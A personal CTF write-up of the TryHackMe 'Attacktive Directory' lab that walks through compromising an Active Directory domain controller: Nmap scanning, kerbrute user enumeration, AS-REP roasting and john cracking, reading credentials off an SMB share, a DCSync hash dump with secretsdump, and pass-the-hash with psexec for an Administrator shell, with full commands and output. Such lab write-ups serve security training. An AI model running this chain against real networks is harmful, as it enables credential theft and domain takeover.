Attacktive Directory ~ Try Hack Me

Finally completed my CEH Master certification and found myself lazing around so here we go :)

I SUCK AT WINDOWS EXPLOITATION ~ Nee

Prerequisite

Just to make life easier I usually add an entry to my hosts file so I can refer to the target by name. Writing to /etc/hosts needs root, hence the tee. Note that the target IP changes part-way through this write-up (the scan ran against 10.10.117.127, everything after it against 10.10.156.245), so keep the entry in sync with whatever IP the machine currently has.

echo "10.10.117.127	tar.get" | sudo tee -a /etc/hosts

Okay now onto hacking!


Reconnaissance

As always, I fired off an Nmap scan against the target machine (-A already implies -sV and -sC; -Pn skips host discovery, which Windows hosts that drop ICMP otherwise fail).

┌──(nee㉿kali)-[~]
└─$ nmap -Pn -sV -sC -p- -A tar.get 
Nmap scan report for tar.get (10.10.117.127)
Host is up (0.35s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-10-05 08:45:57Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2020-10-05T08:48:26+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-10-04T08:35:54
|_Not valid after:  2021-04-05T08:35:54
|_ssl-date: 2020-10-05T08:48:41+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49788/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/5%Time=5F7ADD4A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-10-05T08:48:27
|_  start_date: N/A

The open ports and services make this not just a Windows server but a domain controller for spookysec.local (NetBIOS domain THM-AD, host ATTACKTIVEDIREC, Windows Server build 17763):

  • DNS (53)
  • Kerberos (88) and kpasswd (464)
  • Active Directory LDAP (389/636) and Global Catalog (3268/3269)
  • SMB / RPC (135, 139, 445, 593 and the high RPC ports)
  • RDP (3389)
  • WinRM (5985) and AD Web Services (9389)

Two details from the scan matter later: SMB signing is enabled and required, so NTLM relay against this host is off the table, and the Kerberos server time matched my scanner time (0s skew), which is worth checking because the KDC rejects requests more than five minutes out by default.

Enumerating usernames

The room provides two files, userlist.txt and passwordlist.txt, and those are what the enumeration and cracking steps below run on.

I used kerbrute to validate usernames against the KDC. Its userenum mode sends an AS-REQ without pre-authentication for each name in the list: the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for accounts that do not exist and KDC_ERR_PREAUTH_REQUIRED for ones that do, so valid names are confirmed without a single password guess and without touching anyone's bad-password count.

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ ./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.156.245 userlist.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 10/06/20 - Ronnie Flathers @ropnop

2020/10/06 04:49:07 >  Using KDC(s):
2020/10/06 04:49:07 >   10.10.156.245:88

2020/10/06 04:49:08 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:49:14 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:49:22 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:49:24 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:49:54 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:50:13 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:50:50 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:51:07 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:52:58 >  [+] VALID USERNAME:       [email protected]
2020/10/06 04:53:36 >  [+] VALID USERNAME:       [email protected]

I was able to find out crucial usernames through these attacks. I found out that there were accounts such as:

  • svc-admin
  • administrator
  • backup

I could possibly use one of these accounts to get into the machine.

Exploiting Kerberos

The technique used here is AS-REP Roasting. I recently learnt about Kerberoasting and the two are closely related. Kerberoasting needs a valid domain account to request a service ticket (TGS) for an SPN and then cracks the service account's key offline. AS-REP Roasting instead targets accounts that have the "Do not require Kerberos preauthentication" flag (UF_DONT_REQUIRE_PREAUTH in userAccountControl) set. For such an account the KDC answers an AS-REQ that carries no pre-authentication timestamp, so anyone who knows the username can obtain the AS-REP without proving anything. Its encrypted part is encrypted with a key derived from the user's password (for RC4-HMAC, etype 23, that key is simply the NT hash), which makes it an offline cracking target: no guess ever reaches the DC, so lockout policy never applies.

I performed this with Impacket's GetNPUsers.py (impacket/examples/GetNPUsers.py). The command below asks for svc-admin alone; -usersfile userlist.txt tests every enumerated user in one run, -format john (or hashcat) picks the output format, and -dc-ip 10.10.156.245 avoids depending on name resolution for spookysec.local.

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-admin
[email protected]:80f4807ece8bed030287d392722808dd$148464892db58fe257006835567004e0f3f2a856a4608a1cbce3d858251acfe7c41cf80c1d7ec54b0edad691871910c17564afd893c2cc534e88ab8b6b873e4eee228fcf947ede842452747e0fbdaf55ab1c475cceed283d48ddc5aa604ed8ee8ed8727b3b62f77f634c6e09ff719a53246356edef39f2fb8084b014c1fce8478079a956ce5384d5d1d7121b7173297e8a84e3c4914fd7c6d6618a9221cf3c96280c6ddea7f0ddba1541583bbbfc92b57fc1bd22011a7fd70477c6fd8daccc5d0cd88973a5c0607430e652113642a6de607617dd6866568fcad894ab9364902fd1c7670a7dfa1977ae02d62ff1c2593b35e0

I was presented with the AS-REP hash for the account: the 32 hex characters before the $ are the HMAC-MD5 checksum, the rest is the RC4-encrypted enc-part. All that was left was to crack it with john, and this is where the password list I was given at the beginning came in handy.

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ sudo john hash.txt --wordlist=passwordlist.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
management2005   ($krb5asrep$23$sv[email protected])
1g 0:00:00:00 DONE (2020-10-06 05:15) 100.0g/s 665600p/s 665600c/s 665600C/s horoscope..amy123
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Upon completion I got the password management2005 for the user account  [email protected]

Connecting to shares via the svc-admin account

Now that I had both the username and the password I used smbclient to list the file shares the machine offered. Besides the default administrative shares and the SYSVOL/NETLOGON shares every DC exposes, there was a non-default share named backup.

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ smbclient -L spookysec.local -U svc-admin
Enter WORKGROUP\svc-admin's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share

Now that I had verified that I could access the shares, I tried accessing the backup folder

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ smbclient \\\\10.10.156.245\\backup -U svc-admin
Enter WORKGROUP\svc-admin's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

                8247551 blocks of size 4096. 5269051 blocks available
smb: \> 

I was able to connect to the share and noticed a file named backup_credentials.txt. I downloaded it to my machine and saw that its content was base64 encoded.

smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> ^C
                                                                                                                                                     
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ ls
backup_credentials.txt  hash.txt  kerbrute_linux_amd64  passwordlist.txt  userlist.txt
                                                                                                                                                     
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw 

Decoding it (I used CyberChef; base64 -d on the command line gives the same result) yielded backup@spookysec.local:backup2517860, credentials for the backup account that kerbrute had enumerated a couple of steps earlier.

Dumping hashes

Using the credentials from the previous step, I used Impacket again (a different script, secretsdump.py) to dump every account's NTLM hash and Kerberos keys. The first attempt below fails before authenticating: without an explicit @target Impacket tries to resolve spookysec.local, which is not in my hosts file. Adding @10.10.156.245 fixes that. -just-dc pulls the secrets straight out of NTDS.DIT over the DRSUAPI replication interface, the same mechanism DCSync abuses, so it only works because the backup account holds the Replicating Directory Changes / Replicating Directory Changes All rights on the domain. Any account holding those rights can replicate every secret in the domain, including the krbtgt keys, and has to be treated as equivalent to a domain admin.

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ secretsdump.py spookysec.local/backup:'backup2517860'
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: [Errno Connection error (spookysec.local/backup:backup2517860:445)] [Errno -2] Name or service not known
[*] Cleaning up... 
                                                                                                                                                     
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ secretsdump.py spookysec.local/backup:'backup2517860'@10.10.156.245 -just-dc
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:8bc3bdcaf0f70c78b7bda16b84032f51:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c431e7e3555aeb5b63cbdfee3024d56f4b7f10eaba6c3f94d9a1524e76a26a49
Administrator:aes128-cts-hmac-sha1-96:f955ac2d89620b2a8dcd9837105445ff
Administrator:des-cbc-md5:6d5edfa173d9d6ae
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:7403d3da9fbb21788d7ded46cfa217a336d219376bf22d5f4ae0bba232e91f06
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:1092c7b99ff5efd56ed960531d76647b
ATTACKTIVEDIREC$:des-cbc-md5:d69de55e08c4a845
[*] Cleaning up...

Accessing administrator account of the machine

Lastly, I used Impacket's psexec.py to pass the hash and get a shell as Administrator. NTLM authentication never uses the password itself: the NT hash is the key the challenge-response is computed from, so the hash taken from the NTDS dump authenticates exactly as well as the password would. The value before the colon (aad3b435b51404eeaad3b435b51404ee) is the empty LM hash, which is why Impacket also accepts -hashes :e4876a80a723612986d7609aa5ebc12b. Note how noisy this is: psexec.py uploads a randomly named executable to ADMIN$ and registers and starts a randomly named service, both visible in the output below and both logged as service installations on the target. The required SMB signing seen in the Nmap results does not stop this, since it is a genuine authentication rather than a relay.

┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.156.245.....
[*] Found writable share ADMIN$
[*] Uploading file xLRsIsYU.exe
[*] Opening SVCManager on 10.10.156.245.....
[*] Creating service dfyb on 10.10.156.245.....
[*] Starting service dfyb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

And...I'm in.


That's the end of that box 😩. One of my first windows boxes! But turned out to be not too bad I guess :)